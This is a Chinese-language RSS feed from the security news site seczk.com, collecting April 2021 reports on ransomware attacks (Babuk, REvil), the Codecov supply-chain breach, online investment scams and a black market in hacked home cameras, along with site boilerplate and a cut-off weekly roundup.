安联智库--网络安全新媒体资讯平台 http://seczk.com 信息安全资讯,热点资讯,安全期刊,人物专访,安全事件,漏洞威胁,安全技术,攻防众测, Thu, 22 Apr 2021 23:10:24 +0800 zh-CN hourly 1 https://www.s-cms.cn/?v=4.7.5 加入我们 Thu, 22 Apr 2021 23:10:24 +0800

      欢迎有志从事信息安全的朋友,一起加入安联智库这个大家庭,有你们的到来安联智库将因你而出彩!

]]>
联系我们 Thu, 22 Apr 2021 23:10:24 +0800

安联智库&安联攻防实验室(简称:seczk)www.seczk.com
使命:让安全,更简单!
提出:攻击溯源、纵深防御的安全治理解决方案!
微信 、QQ:110468258
网站:www.seczk.com 
邮箱:110468258#qq.com 
地址:广州市天河区黄埔大道西505号A栋2519室 
机构:[广东-广西-海南-云南-贵州-四川-福建-江西-湖南-北京-深圳-重庆-上海.....] 


]]>
团队简介 Thu, 22 Apr 2021 23:10:24 +0800

    安联智库是为了(简称:seczk)是一个专注于信息安全、具有全面信息安全综合服务能力的专业服务团队。seczk立足自主研发,专注信息安全市场,为客户提供安全产品、安全服务、安全集成、安全培训等多项综合性信息安全服务。经过多年的发展已经成为一个理念先进、方案成熟、团队精干、客户认可的具有本土化特色的信息安全服务商。
    seczk立足于羊城广州,目前拥有一支20多人的专业队伍,团队拥有多名CISP、CISSP、CCIE、PMP等技术人员,核心团队成员都出自国内著名安全厂商与安全服务测评机构(如启明星辰、绿盟、天融信、蓝盾、竟远、南方信息安全研究院、中国信息安全测评中心等),积累了丰富的安全经验,其技术能力已获得过不同行业客户的认可。
    安联智库&安联攻防实验室(简称:seczk)使命:让安全,更简单!提出攻防纵深防御、攻击溯源的安全治理解决方案!




]]>
NCC高官遭巨额诈骗 台湾网红惊讶如此判断 Thu, 22 Apr 2021 23:10:26 +0800 20210422001189.jpg

NCC副主委翁柏宗(左)、宅神朱学恒(右)。(中时新闻网资料照)

    现任台湾“通讯传播委员会副主委”(NCC)翁柏宗,2019年5月以“身体不适”为由闪辞,但去年8月又回任,但他先前辞职后1个半月内,曾被“假检警”诈骗老哏骗倒,到银行领出358万新台币、在超商面交骗徒,虽他事后惊觉受骗当天报警,警方也逮捕嫌犯,但至今钱未追回。对此,“宅神”朱学恒傻眼表示,这种判断力的人竟然可以决定台湾媒体的去留,到底有何说服力?

    对于遭诈骗一事,翁柏宗坦承自己的确遭诈骗,他表示,当下接到电话是觉得有点怪怪的,后来发现被骗就立即报警,警方办案效率高已逮获嫌犯;翁柏宗并指,这些年轻人(嫌犯)已被判刑,应好好反省,改过自新后回归社会,翁也以过来人身分提醒民众,接获可疑来电,最好要多加查证。

    朱学恒今(22)日在社交平台发文指出,要处理判断媒体是不是应该继续存在、媒体表现是不是够好的NCC机构的高官,竟然没有社会经验到会被这些老哏的诈骗集团,跟老哏的诈骗方法给骗了,那到底该如何说服民众这些人有足够的判断力呢?

    朱学恒发文引来网友讨论,在底下留言表示“这就是台湾的官阿,没专业又硬要塞一堆肥猫”、“就是过太爽不知社会险恶民间疾苦”、“怎么感觉不意外”、“不需要判断力,听话才是重要的技能”、“虽然检讨被害人是不对的,但很明显…”。

9999.jpg

]]>
211女硕士知乎遇渣男:落入“杀猪盘”圈套被骗104万 Thu, 22 Apr 2021 23:10:26 +0800 尽管经常被曝光,但还是有人落入网络交友诈骗的套路中。

据媒体报道,河南郑州一名211院校的女硕士小赵,面容、身材姣好,是外人眼中优秀女孩的代表。然而这样一位高知分子,却惨遭“杀猪盘”骗局,短短几天内104万不翼而飞。

报道称,姑娘是一次偶然机会在知乎上回复了一条“郑州的你择偶标准”的问题,随后被一名ID“远方”的人私信搭讪,在看过男子所谓的照片后姑娘觉得还可以,于是两人转入微信聊天。

擅长PUA话术的男子很快俘获了姑娘芳心,男子也流露出自己擅长理财的特点,并适时向女孩推荐了某理财网站,于是噩梦开始。

起初,女孩投了500元立马就赚了50,之后投了3万立刻赚了3000。感觉利润高见效快,又经不住男子和客服的劝说,小赵索性拿出买房的首付,不住不觉砸进去100多万,可没想到网站突然就打不开,男子也失联了。

不难分析,这就是典型的“杀猪盘”骗局,通常是犯罪分子将受害人称作“猪”,欺骗过程称为“养猪”,最后实施诈骗称为“杀猪”。“杀猪盘”的套路通常分为六步走,分别是寻找目标、取得信任、怂恿投资、大量投资、无法体现、销声匿迹。

211女硕士知乎遇渣男:落入“杀猪盘”圈套被骗104万

9999.jpg

]]>
休斯顿火箭队开始着手调查Babuk勒索软件攻击 Thu, 22 Apr 2021 23:10:26 +0800

据报道,Babuk勒索软件团伙被曝泄露了休斯顿火箭队的团队敏感数据。

事件概述

为此,NBA休斯顿火箭队也正式对外宣称,该组织近期遭到了勒索软件攻击,而发动攻击的网络犯罪分子就是Babuk黑客团伙。

Babuk网络犯罪团伙在其勒索网站上发布的一篇帖子上,曝光了一份据称来自于火箭队网络系统中的数据和文件,不过目前这篇帖子已经被删除了。Babuk网络犯罪团伙声称,他们已经删除了相关的500GB数据,其中包括NBA休斯顿火箭队的第三方合同公司、客户、员工和财务信息。

Babuk网络犯罪团伙在其发布的公告中表示:“曝光这些信息可能会导致法律问题,并引起客户的担忧。”

Emsisoft的安全威胁分析师Brett Callow认为,如果Babuk是发动此次勒索软件攻击的网络犯罪团伙,那么即使NBA休斯顿火箭队的技术人员想办法获取到了解密密钥,恢复数据的难度也会非常大。

Brett Callow说到:“跟Babuk有关的勒索软件攻击事件都比较麻烦,因为攻击者所提供的Linux解密程序是有缺陷的,而且在解密数据的过程中还会导致数据丢失。”

来自Kohrman Jackson & Krantz律师事务所的Mark Rasch是负责处理此次勒索软件攻击事件谈判部分的律师,但他并不直接参与此案。他警告用户称,不要根据Babuk勒索软件犯罪团伙删除了此前发布的帖子,就草率地认为我们正在跟网络犯罪分子谈判,或者是我们已经支付了数据赎金。

Mark Rasch说到:“他们可能是无意中把它放上去的,也可能是无意中把它删除的,或者他们可能是故意同时做这两件事的。”

NBA休斯顿火箭队则表示,Babuk勒索软件目前已经感染了该组织的一些计算机系统上,但并没有影响到其他部门的运作。火箭队内部的信息技术人员正在设法阻止Babuk勒索软件的传播,但目前并没有对外公布此次勒索软件攻击的具体发生时间。

该组织在其发布的一份电子邮件声明中提到:“斯顿火箭队最近在其内部网络的某些系统上发现了可疑活动。因此,我们也立刻对此次事件展开了调查,我们正在积极采集取证数据,并开始采取措施阻止未经授权的活动。业内知名的网络安全专家也参与了并协助我们的调查活动。”

目前,NBA休斯顿火箭队正在跟美国联邦调查局以及NBA合作共同调查这一事件。

攻击活动

休斯顿火箭队并没有透露此次攻击活动可能会泄露的数据细节,而且也没有表明是否在跟攻击者进行谈判。据称,Babuk阻止在其发布的一些涉及到NBA相关活动和场馆运营的文件中,有些数据被贴上了“团队销售”的标签。

在过去一年内发布的一些新闻报道中,我们可以了解到,球队老板Tilman Fertita可能正在考虑出售这只球队,而他曾在2017年以22亿美元的价格收购了这支球队。
休斯顿火箭队表示:“这些调查是复杂的、动态的,需要时间才能妥善进行。在我们的调查完成之前,很难确定事件的范围,但我们将继续保持警惕,解决任何可能影响我们球迷、员工和球员的潜在问题。如果调查证实个人信息被曝光,我们将立刻通知客户、球员或员工。像这样的问题并不少见,这也突出了组织对数据文件的备份和加密的重要性。”

Babuk勒索软件

根据趋势科技的说法,Babuk勒索软件首次被发现于2020年12月,当时研究人员将其标记为Vasa Locker。到了2021年,它又被改名为了Babuk。趋势科技的的研究人员表示,Babuk已经进行了一次版本更新,并增加了针对敲诈勒索而设计的数据提取功能。

趋势科技在今年二月份的一份研究报告中写到:“Babuk勒索软件利用ChaCha8流密码进行加密,将椭圆曲线Diffie Hellman用于密钥生成,这将使得在没有访问私钥的情况下恢复文件的可能性非常小。”

McAfee的分析指出,Babuk攻击者使用了多种方法来获得目标系统的访问权,包括网络钓鱼攻击、利用公开应用程序或使用受弱保护的远程桌面协议访问来获取合法凭据。

Emsisoft的研究人员还发现了Babuk勒索软件中的几个代码缺陷,其中涉及到Linux和ESXi服务器上的数据加密和解密,并且会导致目标用户的数据完全丢失。

9999.jpg

]]>
发布会前夕苹果产品图被盗,REvil勒索团伙索要天价赎金 Thu, 22 Apr 2021 23:10:26 +0800 美国太平洋夏令时4月20日上午10点(北京时间美国太平洋夏令时 4 月 21 日凌晨11点,苹果公司以“Spring Loaded”为主题举行了春季发布会特别活动。

而在数小时后,相关美国媒体披露,REvil勒索软件团伙已经窃取了苹果的产品蓝图,并要求苹果公司在5月1日之前支付赎金,否则他们将与几个主要品牌商洽谈出售大量机密图纸和千兆字节的个人数据”。

此次数据泄露源于Apple Watch,Apple Macbook Air和Apple Macbook Pro的制造商,总部位于台湾的Quanta(广达电脑)被勒索攻击。此次攻击发生后,REvil勒索软件团伙首先要求广达电脑在4月27日之前支付5000万美元,或者在倒计时结束后支付1亿美元。1618974771_607f98333cd14fdf07ecb.png!small

然而,该公司拒绝与勒索团伙沟通,也拒绝支付勒索赎金。

在REvil勒索团伙与广达电脑的付款谈判对话中可以看到,REvil警告,如果广达电脑不开始就赎金进行谈判,“所有Apple设备的图纸以及其员工和客户的所有个人数据将被发布”。

由于依旧没有得到回应,REvil就在其数据泄漏站点上发布了原理图。目前REvil在其暗网数据泄漏站点上已经公布了十几个MacBook组件的示意图,不过暂时没有迹象表明它们是Apple的新产品。

74b5fb3b3f38fe1.png

一方面,作为全球规模的笔记本电脑原始设计制造商,不仅是广达电脑遭受勒索攻击,去年Compal 也遭到DoppelPaymer勒索软件攻击。而来自供应链的攻击使得更多客户面临风险,比如广达电脑有着众多知名客户,包括Apple、Dell、Hewlett-Packard、Alienware、Lenovo、Cisco和Microsoft……

注:REvil采用勒索软件即服务(RaaS)运营模式,通过招募“会员”协同破坏受害者网络,以窃取未加密的数据和加密设备而闻名。拿到勒索赎金后,REvil核心开发人员和关联公司会分摊赎金,而关联公司通常会获得更大的份额。

9999.jpg

]]>
勒索软件团伙试图在Spring Loaded活动前勒索苹果公司 要求支付赎金 Thu, 22 Apr 2021 23:10:26 +0800        据外媒The Record报道,REvil勒索软件的运营商要求苹果公司支付赎金,以避免其机密信息在暗网中遭泄露。REvil团队声称,他们是在对广达电脑公司进行网络攻击后掌握了苹果产品的数据,广达电脑公司是全球第一大笔记型电脑研发设计制造公司,也是根据预先提供的产品设计和原理图组装苹果官方产品的公司之一。REvil团伙在一个暗网门户网站上发布的信息中说,广达公司拒绝付款以取回其被盗的数据,因此,REvil运营商现在决定转而对付该公司的主要客户。

REvil-Quanta-extortion.png

REvil团伙发布了21张描述MacBook原理图的截图,并威胁说每天都会发布新的数据,直到苹果或广达支付赎金要求。

此外,该勒索软件团伙还暗示,其他公司的数据也可能被泄露到网上。“我们的团队正在与几个大品牌协商出售大量的机密图纸和数千兆字节的个人数据,”REvil运营商写道。“我们建议苹果公司在5月1日前买回可用数据。”

广达电脑公司的已知客户包括一些世界上最大的笔记本电脑供应商,如惠普戴尔微软东芝、LG、联想和许多其他公司。

一位熟悉广达谈判的消息人士说,REvil团伙要求的赎金为5000万美元,与他们上个月向笔记本电脑制造商宏基要求的金额相似。目前还不清楚REvil团伙现在期望从苹果公司得到多少钱。

这次勒索企图的时间安排与苹果公司宣布新产品和软件更新的Spring Loaded活动相吻合,以获得最大的知名度。

Dmitry Smilyanets是Recorded Future的威胁情报分析师,他告诉The Record,REvil的公共发言人,一个绰号为UNKN的人,在周日的论坛帖子中暗示了周一的公告,称今天的泄密是 “有史以来最引人关注的攻击”。

UNKN-post-1536x352.png

Smilyanets告诉The Record,这也是赎金软件团伙在被攻击的公司拒绝支付赎金费用后,公开向受害者的客户提出赎金要求的第一个重大事件。这是双重勒索中的一种新方法,即威胁者在与主要受害者谈判赎金未果后,与受影响的第三方进行接触。

苹果公司表示,它正在调查这一事件,目前没有什么消息可以分享。The Record无法联系到广达电脑公司的发言人进行评论,一位接听电话的人要求第二天再打电话。

两家公司仍极有可能淡化这一事件,并将被盗数据归类为非敏感信息。

周二泄露的文件显示了Macbook笔记本电脑的原理图,其中没有一个是特别敏感的,似乎也不包括组装信息和技术细节以外的内容。其中一个文件的日期是2021年3月9日,但不清楚所描述的产品是新产品还是只是更新的技术规格。

虽然广达被认为是世界上最大的笔记本电脑制造商,但第二家,同为中国台湾公司的仁宝在2020年11月遭遇了自己的勒索软件事件,当时它的一些文件被DoppelPaymer勒索软件团伙盗取,内部网络被加密。

9999.jpg

]]>
美国第二大汽车保险业者官网含漏洞,允许黑客窃取客户驾照号码 Thu, 22 Apr 2021 23:10:26 +0800

    美国第二大汽车保险业者Geico在4月上旬,公告了该平台的数据外泄事件,指出在今年的1月21日到3月1日间,黑客利用官网的线上销售系统漏洞,盗走了客户的驾照号码,而且相信黑客可能会利用这些信息,以受害者的名义来申请失业救济金。

640 (5).png


Geico约有1,700万张保单,该公司并未说明漏洞细节,也未公布受害人数,仅强调外泄的数据只有客户的驾照号码,且在察觉问题之后,已立即找出漏洞并予以修补。
此外,Geico还特别提醒客户,若收到各州失业部门的任何邮件时,都应该仔细检查,并在发现异样时直接与该部门联系。

9999.jpg

]]>
顺手点了一个“赞”,差点损失三十万! Thu, 22 Apr 2021 23:10:26 +0800 近日

扬州警方破获一起

“杀猪盘”式电信诈骗

因警方行动迅速、抓捕及时

受害人近30万元损失被全数追回

获得央视点赞

案件经过



01

点赞后加好友 小恩小惠引诱上钩


前不久,扬州市民李女士在玩手机时偶然看到一个名为“带大家发财”的小视频。视频中,一名男子说有投资发财的路子,李女士虽说不太相信,但还是顺手点了“赞”。没过多久,发视频的男子三番五次要求加好友。 


640 (4).png


李女士加好友后,对方介绍自己叫“温国涛”,做网络维护工作。过了一周,“温国涛”突然发来消息,告诉李女士有赚钱的机会,想拉她一起发财


“温国涛”介绍到,自己帮一家“万联证券”做网络维护,发现操作系统有漏洞,可以通过内部操作赚钱,需要李女士下载个“万联证券”帮他操作买股票。


李女士用对方提供的账户登录证券平台,按他的指示进行操作。随后,对方发给李女士一百元红包表示感谢。 


640.webp (4).jpg


第二天,对方又发来两百元钱红包,声称前一天李女士的操作让他赚到了钱。


之后,李女士帮对方操作多次,都赚到了红包,越发相信“温国涛”有内幕消息。于是,李女士自己也在“万联证券”注册账号,并存钱试水


640.webp (5).jpg


李女士在平台上先后赚了几千块钱,李女士的一位朋友也拿钱存入李女士账户,两人前后共投近三十万元,账面上的盈利数字越来越大。


正当两人准备提现时,却出了问题。李女士找到“温国涛”,“温国涛”解释是网络维护的问题。但过了几天还是无法提现,李女士准备报警,却遭到“温国涛”的威胁。



02

民警顺藤摸瓜 端掉犯罪团伙


李女士思来想去,最终选择报警。民警了解情况后,初步断定这是一起颇为高明的“杀猪盘”——骗子先投入几千元诱骗受害者,再连本带利骗回来。


通过调查,李女士看到的小视频“带大家一起发财”,是骗子抛出的诱饵,诈骗分子通过视频下的点赞、留言,筛选行骗对象。


640.webp (6).jpg


警方顺藤摸瓜,最终成功将该团伙抓获归案。据犯罪嫌疑人交代,因警方行动迅速,团伙还没来得及对李女士被骗的30万元进行进一步分解。



目前,此案还在进一步办理中。


小苏提醒


网络投资必须提高警惕,对于高回报低风险的网络投资一定要擦亮眼睛,辨别真假,做到“不轻信、不透露、不转账”。一旦发现被骗,要及时保存证据,第一时间向公安机关报警求助。

9999.jpg



]]>
兄弟,我银行卡被冻结了,帮我办张新的呗 Thu, 22 Apr 2021 23:10:26 +0800

昔日有恩的兄弟

银行卡被冻结遇到难处

以自己名义帮其办银行卡和手机卡

却给自己带来了祸事


案件还原


在山西打工的陈某与刘某私下关系不错,陈某在困难时受到过刘某的帮助。2019年,刘某找到陈某说自己的银行卡被冻结了,能不能帮他去办理一张银行卡,再办理一张新的电话卡与银行卡绑定


因受过刘某的帮助,陈某就帮忙办了银行卡和电话卡,并邮寄给刘某使用。


刘某拿到卡后,用陈某的身份证号、手机卡和银行卡注册了某交友app账号,通过“抢红包”方式开设网上赌场,总计接受普通个人红包金额84万元人民币,定向红包发送金额70多万元人民币,个人红包发送金额12万多元人民币。


2021年2月,盐城警方通过巡线追踪抓获帮助信息网络犯罪嫌疑人陈某。经查,2019年1月份,陈某为谋取利益,将自己的身份信息、银行卡、电话卡提供给刘某从事网络赌博活动,用于接收赌资


陈某被抓获后悔不当初,自言:“我不应该把我自己的银行卡和电话号码提供给别人用,之前我就认为是帮朋友一个忙,也不认为这事犯法,现在我知道了,我以后再也不会把个人重要信息透露给任何人。”


640.webp (3).jpg


目前,陈某因涉嫌帮助信息网络犯罪活动被警方取保候审,刘某因涉嫌开设赌场被检察院批准逮捕。


小苏提醒


一定要妥善保护好个人信息,尤其是银行卡、手机等信息载体,切勿将身份证号、支付账户、手机号码等隐私信息随意泄露给他人。

9999.jpg

]]>
勒索凶猛!物流停运!荷兰多地超市发生食品断货 Thu, 22 Apr 2021 23:10:26 +0800

640.webp (1).jpg


仓储与运输服务商Bakker Logistiek遭遇勒索软件攻击,导致荷兰多家超市发生食品断货。

 
Bakker Logistiek是荷兰国内规模最大的物流服务商之一,专门为荷兰各超市提供恒温仓储与食品运输服务。
就在上周,Bakker Logistiek公司遭遇勒索软件攻击,业务网络上的设备被对方加密,食品运输与配送体系也随之瘫痪
该公司主管Toon Verhoeven就此事接受采访时表示,“我们无法正常接收客户订单,也搞不清现有商品存放在仓库内的哪些区域。我们的仓库非常巨大,逐一排查根本就不现实。我们还有大量配送货车,但由于统筹调度工作根本无法手动完成,目前的运输业务也无法正常运转。”
此次事件给荷兰最大的连锁超市Albert Heijn直接带来连锁反应,包括奶酪在内的多种食品暂时无法供应

640.webp (2).jpg

Albert Heijn超市中的空货架

货品短缺迫使Albert Heijn在其官方网站上发布通告,提醒客户独立包装的奶酪已经出现供应问题。
该超市在官网上写道,“由于技术故障,采用独立包装的奶酪货品供应受限。物流服务商正努力解决问题并尽快恢复供应。对于由此带来的不便,我们深表歉意。”
Bakker Logistiek公司表示可以使用备份副本恢复受到影响的系统,并已经开始与客户方面协调以恢复配送业务。
目前还不清楚勒索软件团伙是如何针对Bakker Logistiek发动攻击的,但Verhoeven在采访中提到,他们猜测攻击方是通过最近披露的微软Exchange服务的ProxyLogon漏洞掌握了系统访问权限。
Bakker Logistiek公司并不是全球首家遭遇勒索软件攻击的仓储物流运营商。去年11月,国际恒温仓储运营商Americold同样遭遇勒索软件攻击,期间电话系统、电子邮件、库存管理与订单履行等均受到影响。

9999.jpg

]]>
摄像头的AB面:安全“保护伞”还是“偷窥”利器? Thu, 22 Apr 2021 23:10:26 +0800        本意为保护安全的摄像头,正在成为不法分子的“偷窥”利器。店面防盗监控、家庭摄像头、仓库安保设备……随着物联网进程的加快,智能摄像头正走进千家万户,几乎成为“标配”。但如果防控措施跟不上,则很容易“引狼入室”。

“老台打包166元200多个ID,新台40一个。”

“150元30个酒店35个家庭ID,200元40个酒店45个家庭ID。”

3月31日至4月10日,新京报贝壳财经记者调查发现,大量已被不法分子“破解”的智能摄像头ID地址正作为“直播台”在黑灰产平台上明码标价公开销售,而可以观看这些摄像头实时画面的App以及破解摄像头的工具甚至已经更新换代了很多次。

4月7日,新京报贝壳财经记者发现相关的摄像头ID账户名称以及密码被以40元到200元不等的价格在黑灰产人平台销售,记者从黑灰产人士处购买到了相关App,发现遭到泄露的摄像头场景包括公开的试衣间、仓库、店面以及私人家庭。

对此,某安全公司相关专家对记者表示,该类远程视频监控App被黑产团队恶意利用。黑产团队通过对其他系统“脱库”或暴力破解存在弱口令漏洞的摄像头设备,获取摄像头的账号密码,然后拿着这些账号和密码去平台售卖。购买者使用购买的账号密码通过App登录即可实时观看监控画面,偷窥他人隐私。根据其出具的检测报告,上述App本身也存在违规获取隐私的行为。

破解摄像头黑灰产从业者发布的广告。

摄像头场景实时直播400元购买“破解摄像头”的软件

“你要新台还是老台?”4月7日,当贝壳财经记者通过黑灰产平台联系到破解摄像头ID卖家“空情”时,对方这样表示。

那么,什么是所谓的”新台“、”老台“?偷拍爱好者们习惯以“台”来称呼摄像头的ID。经常能看到“有新台吗?”“有没有好的ID给我扫台”的发言。“空情”向记者介绍,老台指在网上流传多年的老摄像头ID,新台则是指新发现的直播摄像头。“老台打包166元200多个ID,新台40一个。”

黑灰产给记者发送的售卖破解摄像头的ID广告。

新京报贝壳财经记者浏览“空情”发来的不同摄像头所在的场景时发现,这些供出售的摄像头涵盖了女服装店试衣间、母婴月子会所、服装店仓库、私人家庭等。“如果按类型购买,150元30个酒店35个家庭ID,200元40个酒店45个家庭ID。”

“空情”告诉记者,还可以花费400元直接购买“可扫描并定位破解摄像头”的软件。“购买这个软件后可以自己寻找摄像头并破解,然后就能观看别人的摄像头了。”

为了一探究竟,4月7日,记者通过不同的渠道分别向2名卖家购买了摄像头ID,购买后,对方向记者发送了名称不同的App,并表示下载App后,可以通过在里面输入其提供的账户和密码的形式连接“已被破解”的摄像头。记者输入卖家提供的ID号码,并输入极为简单的密码后发现,确实能看到他人摄像头的内容,且监控画面是实时进行的。

“大学生XX直播给你看,多刺激。”在一个以偷拍交流为主题的论坛中,当谈及购买偷拍ID与国外成人电影的区别时,有网友表示。“买ID后,打开看不一定一直都有内容的,但是刺激就刺激在这是实时直播的。”“空情”向记者如此推荐。

破解摄像头黑灰产从业者的聊天截图。

试衣间和私人家庭监控最紧俏机主发展代理层层加价售卖

新京报记者发现,在装有摄像头的ID中,试衣间和私人家庭监控最为紧俏,而公共区域的摄像头则几乎无人问津。

需要注意的是,与因安防监控需求安装摄像头的上述地方相比,酒店房间、厕所等私密性场合是没有摄像头的,但为了满足少部分人的需求,有黑灰产人士铤而走险,在这些地方安装针孔摄像头,此后再把这些摄像头的ID作为资源公开出售。

黑灰产论坛中的偷拍“频道”。

新京报贝壳财经记者调查发现,安装针孔摄像头或者能够破解他人摄像头ID和密码的人被称为“机主”。由于掌握账号和密码,机主会通过发展代理售卖摄像头的观看权。

在中国裁判文书网近日公布的另一起制作、贩卖、传播淫秽物品牟利案中,安装者在QQ群中发送视频截图及文字介绍宣传“推广”,再以每个邀请码150元到200元的价格销售给下线代理,代理则在加价后继续发展下线或直接售卖给网友进行观看。经过层层加价后,一个邀请码最高能卖至600元以上,每个摄像头最多可生成100个邀请码,供百人同时在线观看,而针孔摄像头的价格则仅有150元左右。

“机主新上台,一个台不保证能有多久,但24小时有人,保证精彩不断,需要购买联系我。”在黑灰产平台中,有代理发布了这样的“广告”。

更值得注意的是,除了真正的破解摄像头黑灰产外,还有不法分子以此为噱头进行诈骗。4月7日,新京报贝壳财经记者通过QQ搜索向一名自称能出售“摄像头ID及破解软件”的网友购买了软件后,对方并未发送相关ID,记者在贴吧、论坛等地发现,此类情况并不少见。

摄像头漏洞遭人利用云视通品牌中招

某安全公司相关专家对记者表示,该类远程视频监控App被黑产团队恶意利用。黑产团队通过对其他系统“脱库”或暴力破解存在弱口令漏洞的摄像头设备,获取摄像头的账号密码,然后拿着这些账号和密码去平台售卖。

新京报贝壳财经记者发现,目前黑市中较为流行的摄像头ID来自一家名为“云视通”的智能摄像头。4月12日,记者通过对比发现,此前向黑灰产卖家购买的2款可观看摄像头内容的App在界面上与云视通App类似。

4月10日,贝壳财经记者在一个偷拍黑灰产论坛中发现,有卖家上传了其使用“云视通扫台工具”破解云视通监控系统的画面,根据画面,其扫描出了182个在线ID。但卖家给记者提供的App并非云视通正版App,对此,有熟悉黑灰产的人士表示,这些App应该是云视通的“山寨”产物。

此外,根据安全公司出具的分析报告,卖家发给记者的2款监控App内,其中一款应用集成的第三方SDK在弹出隐私政策用户授权之前,就获取并上传用户App安装列表、位置、设备、wifi信息等敏感信息;另一款应用获取用户App安装列表、设备信息、wifi信息等敏感信息上传,无用户授权提示。

新京报贝壳财经记者注意到,浙江景宁警方曾破获一起售卖家庭摄像头破解软件案,警方查实已被破解的家庭摄像头账号近万个,涉及全国多地。

在中国裁判文书网公布的一份刑事判决书中,被告人张某在网上出售能够通过扫描摄像头非法侵入他人监控系统,预览摄像头画面的软件程序。并以办理年卡、月卡等形式,以100元、200元、300元、400元、500元不等的价格,在网上出售该软件程序。经鉴定,该软件程序具有扫描摄像头并利用漏洞获取IP摄像头用户名和密码并登录预览摄像头画面的功能;具有对“安格华”、“云视通”、“有看头”三款摄像头进行弱口令猜接,并调用对应程序进行画面预览的功能。判决显示,被告人张某犯提供侵入、非法控制计算机信息程序、工具罪。

贝壳财经记者观察发现,除了云视通外,在黑灰产平台中出现较多的摄像头品牌还有乐橙与萤石云。如有黑灰产人士发布广告称“最新萤石云台上新,超清学生台,欢迎代理过来拿货,目前机主仅对接我一人,想拿台找我。”还有黑灰产人士公布与“同行”的聊天记录表示多家平台中“乐橙台超清”。此外,360摄像头在之前的新闻中也曾被曝其水印出现在了外网流传的偷拍视频中。

破解软件成敛财工具责任何在?

新京报贝壳财经记者浏览市面已有的摄像头发现,一台摄像头可以分享给多人观看的功能较为常见,但其目的主要是为了分享给家人或员工,以保证安全性,但当这一功能被不法分子利用,就会让监控摄像头成为“隐私直播平台”。

为什么摄像头这么容易被破解?摄像头轻易被破解,厂商有没有责任?对此, 杭州安恒信息技术公司安全研究院院长吴卓群曾为一些智能摄像头企业做过安全监测。他发现不少厂商的产品在软件设置上存在“不强制用户修改初始密码,甚至不设密码”的问题。“尽管现在生产者信息安全意识有所提高,但值得担忧的是此前生产的存在安全漏洞的摄像头已流入千家万户。”吴卓群说。

也有专业人士告诉记者,利用被泄露的用户名和密码登录App查看别人的摄像头,责任本身不在企业,“用户需要提高警惕,使用强密码、定期更新设备以及启用双因素身份验证。”而对于不法分子以不良目的购买摄像头主动安装偷窥的行为,摄像头企业本身也无法辨别。

但对于如何防止摄像头被破解,不少安全专家均给出了建议。如在2020年举办的第八届互联网安全大会上,360集团硬件专业委员会执行主席孙浩表示,围绕摄像头常见的安全漏洞可以分为三大类:第一类是命令注入漏洞,可以借此执行系统命令或者运行任意程序;第二类是授权问题,可以访问未授权或者通过某个隐藏入口直接访问对应的设备;第三类是服务器存在访问控制缺陷,例如2018年4月HK云服务器发现访问控制缺陷,任意人可以通过该漏洞实现查看摄像、回放录像、添加账户共享等操作。

在孙浩看来,其中影响最大的安全漏洞还是弱密码问题,“弱密码之前在摄像机、路由器上都很常见,摄像机上尤其突出,因为多数用于公共安防的摄像机需要和NVR等设备做集成部署,所以多数摄像机都是使用的默认密码,在互联网上只要搜索一下就能够得到主流设备厂商的默认用户名和密码。如果摄像机暴露在公网,通过弱密码一碰,很容易就能够控制摄像机,压根不需要什么复杂的操作。”

新京报贝壳财经记者发现,在记者购买到的已泄露摄像头中,卖家发给记者的密码确实都是极其简单的“弱密码”。

在新京报记者此前的调查中,云视通客服人员查询记者购买的账号后告知记者,该摄像头从购买后一直未更改,系用默认连接,“客户连上后,没有修改密码”。客服人员解释称,上述账号对应的家用摄像头是老款产品,需要自己修改密码,升级到最新版本后,若不修改密码,每次登录都会强制提醒用户修改。

孙浩表示,安全渗透服务是物联网安全的最后一道防线。每一款新硬件、每一个固件在发版前,都需要按照流程做安全渗透审查。“物联网安全不仅需要与使用场景高度结合,更需要良好的研发规范和安审流程做保障。”

9999.jpg

]]>
代码测试平台Codecov遭持续入侵,漏洞利用长达数月 Thu, 22 Apr 2021 23:10:26 +0800 CodeCov漏洞是否会带来下一个大型软件供应链攻击事件

最新消息,软件审计平台Codecov遭黑客入侵,该事件可能影响其2.9万名客户,并且引发大量公司连锁数据泄露,造成又一起”供应链“重大安全危机。

下游用户面临安全危机

1月31日开始,黑客瞄准Codecov,利用Codecov的Docker映像创建过程中出现的错误,非法获得了其Bash Uploader脚本的访问权限并且进行了修改。而这意味着攻击者很有可能导出存储在Codecov用户的持续集成(CI)环境中的信息,最后将信息发送到Codecov基础架构之外的第三方服务器。

1618803869_607cfc9da213e95995384.png!small?1618803871122

严格来说,Bash Uploader脚本被篡改,将导致:

用户执行Bash Uploader脚本时,通过其CI运行器传递的任何凭据,令牌或密钥都可以被攻击者访问。

攻击者可以使用这些凭据、令牌或密钥访问任何服务、数据存储和应用程序代码。

使用Bash Uploaders将覆盖范围上传到CI中的Codecov的存储库的git远程信息(原始存储库的URL)。

此次事件对于Codecov的用户来说无异于无妄之灾。首先,Codecov并不是一家公开上市的公司,只有数十名员工,年收入为数百万美元,相比SolarWindsMicrosoft显得不具备太大的吸引力。因此,可以合理判断攻击者入侵该平台更多是作为供应链攻击的考虑,获取其客户的访问权限对攻击者来说更有价值。

据悉,由于Codecov被行业内多家公司用来测试代码错误和漏洞,其客户包括了消费品集团宝洁公司、网络托管公司GoDaddy Inc、华盛顿邮报和澳大利亚软件公司Atlassian Corporation PLC等。虽然暂时还没有相关受害者发表声明,但攻击者很可能已经有所”收获“。

入侵持续至少2个月

攻击从1月31日就开始进行,但第一个客户发现不对劲时已经是4月1日,这表示被入侵的软件在长达数月时间里正常流通,潜在受害者无数。

目前,美国联邦调查局正在调查此事,但暂时没有公开对此事进行详细说明。Codecov则已经对可能受影响的脚本进行了保护和修复,并且给受影响的用户发了电子邮件。不过暂时没有透露这些用户的信息。

1618803862_607cfc96a2db49aa0fbf0.png!small?1618803864038

Codecov入侵事件的威胁程度或许可以与SolarWinds黑客事件媲美,而相比以往更为频繁的供应链攻击,进一步证明代码审查和签名变得极为重要,而围绕这些代码签名密钥的存储和处置的透明性将是建立对渠道信任的关键一步。

最后,建议所有受影响的用户立即在使用Codecov的BashUploaders程序的CI进程中重新回滚其环境变量中的所有凭据、令牌或密钥。

参考来源

https://about.codecov.io/security-update/

9999.jpg

]]>
安全周报(04.12-04.18) Thu, 22 Apr 2021 23:10:26 +0800

1、微信被曝高危0day漏洞,建议立即更新


4月16日,微信PC版客户端被曝存在一个高危等级的在野0day漏洞。

640.png

